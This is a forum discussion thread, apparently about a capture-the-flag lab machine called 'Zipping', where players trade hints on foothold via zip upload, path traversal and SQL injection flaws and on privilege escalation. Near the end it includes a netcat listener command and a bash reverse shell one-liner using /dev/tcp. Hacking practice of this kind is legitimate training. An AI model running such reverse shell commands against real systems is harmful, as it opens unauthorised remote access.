Official Zipping Discussion

If anyone is lost in this machine after user flag, PM me, i’m open to collaboration

1 Like

Hi, I am poking at the system through different vectors but stuck trying to get foothold. Anyone around to discuss where I am at?

I have the same problem, I cant do the foothold.

Tip that helped me when I got stuck getting foothold: When you have enough information about the environment, try to replicate it locally to test your exploits. Errors have valuable information.

I too have been stuck on getting foothold. I was able to get user flag by using the upload vulnerability, but I am not sure where to go from here. If anyone has any hints or suggestions please let me know.

I feel like the machine is broken.
I found an interesting binary to exploit but it doesn’t seem to work properly.
Can someone that already flagged it try it again and tell me?

Ps: owned user trying to get root flag

I’m stucked, I found the Path Traversal, also the custom SQLi. With the 1º vulnerability I found user flag, but with the second one, even if I can get database information, I am not able to retrieve any valuable information or to write a file. Any ideas?

Guys, I finally got root flag. It took me 3 days but finally I got it. If you need a tip let me know.

Im stuck with getting the shell.
i get the connection but it says ambiguous redirect !!
any help please ?

me 2

great box!! can’t wait for 0xdf’s walkthrough.

cant get initial foothold to the machine. I tried uploading a zip file containing reverse shell and all but was of no use. can anyone please help?

look for vulnerabilities in zip file upload services

Does anyone have an idea if this issue is related to the machine or to my host?
I’m fairly new to this, but I suspect this is not an issue on my end right?

My reverse shell is not working properly anymore, although it did minutes before:

rlwrap -cAr nc -nvlp 4444
listening on [any] 4444 …
connect to [10.10.14.xxx] from (UNKNOWN) [10.10.11.229] 48028
bash: cannot set terminal process group (1108): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.2$

or when I do it without readline wrap:

sh: 0: cant access tty; job control turned off
sh$

It came just after the last step for privilege escalation, before getting the root, because the “script” in the shell hang up, first in a loop, after that a restart of the rshell than unresponsive again. I can still navigate and execute commands.

what rshell are you using?

Bash -i if its what you mean

are you using something similar to this?
bash -i >& /dev/tcp// 0>&1